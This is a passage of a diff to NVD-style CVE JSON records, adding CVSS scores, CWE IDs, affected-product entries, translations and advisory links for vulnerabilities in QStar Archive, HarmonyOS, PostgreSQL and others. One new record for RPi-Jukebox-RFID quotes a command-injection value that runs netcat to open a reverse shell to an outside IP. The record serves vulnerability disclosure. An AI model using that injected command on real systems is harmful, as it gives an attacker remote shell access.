"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-501xx/CVE-2023-50128.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50128",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.817",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:21.510",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,15 +14,73 @@
"value": "El sistema remoto sin llave del sistema de Hozard alarm system (alarmsystemen) v1.0 env\u00eda una se\u00f1al de radiofrecuencia id\u00e9ntica para cada solicitud, lo que da como resultado que un atacante pueda realizar ataques de repetici\u00f3n para desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"attackVector": "ADJACENT_NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-294"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "http://hozard.com",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
},
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
}
]
}

6
CVE-2023/CVE-2023-502xx/CVE-2023-50269.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-50269",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-14T18:15:45.070",
"lastModified": "2024-01-09T02:15:45.280",
"lastModified": "2024-01-19T16:15:10.063",
"vulnStatus": "Modified",
"descriptions": [
{
@ -184,6 +184,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0005/",
"source": "security-advisories@github.com"
}
]
}

8
CVE-2023/CVE-2023-504xx/CVE-2023-50495.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50495",
"sourceIdentifier": "cve@mitre.org",
"published": "2023-12-12T15:15:07.867",
"lastModified": "2023-12-18T18:30:24.743",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:10.193",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -83,6 +83,10 @@
"Mailing List",
"Patch"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0008/",
"source": "cve@mitre.org"
}
]
}

8
CVE-2023/CVE-2023-509xx/CVE-2023-50963.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2023-50963",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.970",
"lastModified": "2024-01-19T02:15:07.970",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101."
},
{
"lang": "es",
"value": "IBM Storage Defender - Data Protect 1.0.0 a 1.4.1 es vulnerable a la inyecci\u00f3n de encabezados HTTP, causada por una validaci\u00f3n incorrecta de la entrada por parte de los encabezados HOST. Esto podr\u00eda permitir que un atacante realice varios ataques contra el sistema vulnerable, incluido cross-site scripting, envenenamiento de cach\u00e9 o secuestro de sesi\u00f3n. ID de IBM X-Force: 276101."
}
],
"metrics": {

68
CVE-2023/CVE-2023-510xx/CVE-2023-51062.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51062",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.757",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:51:22.653",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command."
},
{
"lang": "es",
"value": "Un archivo de registro no autenticado le\u00eddo en el componente log-smblog-save de QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 permite a los atacantes revelar el contenido del registro SMB mediante la ejecuci\u00f3n de un comando manipulado."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-306"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51062.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-510xx/CVE-2023-51064.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51064",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.870",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:49:54.723",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table."
},
{
"lang": "es",
"value": "Se descubri\u00f3 que QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0, contiene una vulnerabilidad de XSS reflejado basada en DOM dentro del componente qnme-ajax?method=tree_table."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51064.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-510xx/CVE-2023-51065.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51065",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.913",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:39:34.107",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "Incorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server."
},
{
"lang": "es",
"value": "El control de acceso incorrecto en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados obtener copias de seguridad del sistema y otra informaci\u00f3n confidencial del QStar Server."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51065.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-510xx/CVE-2023-51066.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51066",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.957",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:32.340",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An authenticated remote code execution vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows attackers to arbitrarily execute commands."
},
{
"lang": "es",
"value": "Una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo autenticado en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a los atacantes ejecutar comandos de forma arbitraria."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-94"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51066.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-510xx/CVE-2023-51070.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51070",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:08.100",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:36.020",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily adjust sensitive SMB settings on the QStar Server."
},
{
"lang": "es",
"value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados ajustar arbitrariamente configuraciones SMB confidenciales en el servidor QStar."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51070.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

68
CVE-2023/CVE-2023-510xx/CVE-2023-51071.json
View File

@ -2,19 +2,79 @@
"id": "CVE-2023-51071",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:08.143",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:20:47.503",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily disable the SMB service on a victim's Qstar instance by executing a specific command in a link."
},
{
"lang": "es",
"value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados desactivar arbitrariamente el servicio SMB en la instancia Qstar de una v\u00edctima ejecutando un comando espec\u00edfico en un enlace."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51071.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

4
CVE-2023/CVE-2023-519xx/CVE-2023-51946.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-51946",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.500",
"lastModified": "2024-01-19T14:15:12.500",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

4
CVE-2023/CVE-2023-519xx/CVE-2023-51947.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-51947",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.553",
"lastModified": "2024-01-19T14:15:12.553",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

4
CVE-2023/CVE-2023-519xx/CVE-2023-51948.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-51948",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.663",
"lastModified": "2024-01-19T14:15:12.663",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

81
CVE-2023/CVE-2023-521xx/CVE-2023-52109.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-52109",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.763",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:12:37.337",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}

8
CVE-2023/CVE-2023-55xx/CVE-2023-5528.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-5528",
"sourceIdentifier": "jordan@liggitt.net",
"published": "2023-11-14T21:15:14.123",
"lastModified": "2023-11-30T15:10:23.117",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:10.280",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -181,6 +181,10 @@
"tags": [
"Mailing List"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0009/",
"source": "jordan@liggitt.net"
}
]
}

8
CVE-2023/CVE-2023-57xx/CVE-2023-5716.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2023-5716",
"sourceIdentifier": "twcert@cert.org.tw",
"published": "2024-01-19T04:15:09.360",
"lastModified": "2024-01-19T04:15:09.360",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission."
},
{
"lang": "es",
"value": "ASUS Armory Crate tiene una vulnerabilidad en la escritura de archivos arbitrarios y permite a atacantes remotos acceder o modificar archivos arbitrarios enviando solicitudes HTTP espec\u00edficas sin permiso."
}
],
"metrics": {

6
CVE-2023/CVE-2023-58xx/CVE-2023-5868.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-5868",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.163",
"lastModified": "2024-01-19T03:15:08.130",
"lastModified": "2024-01-19T16:15:10.410",
"vulnStatus": "Modified",
"descriptions": [
{
@ -452,6 +452,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",

6
CVE-2023/CVE-2023-58xx/CVE-2023-5869.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-5869",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.410",
"lastModified": "2024-01-19T03:15:08.343",
"lastModified": "2024-01-19T16:15:10.620",
"vulnStatus": "Modified",
"descriptions": [
{
@ -528,6 +528,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",

6
CVE-2023/CVE-2023-58xx/CVE-2023-5870.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-5870",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.643",
"lastModified": "2024-01-19T03:15:08.583",
"lastModified": "2024-01-19T16:15:10.867",
"vulnStatus": "Modified",
"descriptions": [
{
@ -452,6 +452,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",

6
CVE-2023/CVE-2023-62xx/CVE-2023-6277.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-6277",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-11-24T19:15:07.643",
"lastModified": "2024-01-14T02:15:46.917",
"lastModified": "2024-01-19T16:15:11.057",
"vulnStatus": "Modified",
"descriptions": [
{
@ -181,6 +181,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7ZGN2MZXJ6E57W3L4YBM3ZPAU3T7T5C/",
"source": "secalert@redhat.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0002/",
"source": "secalert@redhat.com"
}
]
}

46
CVE-2024/CVE-2024-03xx/CVE-2024-0318.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-0318",
"sourceIdentifier": "cve-coordination@incibe.es",
"published": "2024-01-15T17:15:09.060",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:13:08.503",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
},
{
"source": "cve-coordination@incibe.es",
"type": "Secondary",
@ -50,10 +70,30 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:fireeye:hxtool:4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8890FF42-C498-4DC3-95C7-2432822CDB35"
}
]
}
]
}
],
"references": [
{
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products",
"source": "cve-coordination@incibe.es"
"source": "cve-coordination@incibe.es",
"tags": [
"Third Party Advisory"
]
}
]
}

8
CVE-2024/CVE-2024-07xx/CVE-2024-0705.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2024-0705",
"sourceIdentifier": "security@wordfence.com",
"published": "2024-01-19T10:15:34.287",
"lastModified": "2024-01-19T10:15:34.287",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
},
{
"lang": "es",
"value": "El complemento Stripe Payment Plugin for WooCommerce para WordPress es vulnerable a la inyecci\u00f3n SQL a trav\u00e9s del par\u00e1metro 'id' en todas las versiones hasta la 3.7.9 incluida debido a un escape insuficiente en el par\u00e1metro proporcionado por el usuario y a la falta de preparaci\u00f3n suficiente en la consulta SQL existente. Esto hace posible que atacantes no autenticados agreguen consultas SQL adicionales a consultas ya existentes que pueden usarse para extraer informaci\u00f3n confidencial de la base de datos."
}
],
"metrics": {

4
CVE-2024/CVE-2024-07xx/CVE-2024-0712.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-0712",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T14:15:12.837",
"lastModified": "2024-01-19T14:15:12.837",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

4
CVE-2024/CVE-2024-07xx/CVE-2024-0713.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-0713",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T14:15:13.277",
"lastModified": "2024-01-19T14:15:13.277",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

84
CVE-2024/CVE-2024-07xx/CVE-2024-0714.json Normal file
View File

@ -0,0 +1,84 @@
{
"id": "CVE-2024-0714",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T15:15:08.997",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"attackVector": "NETWORK",
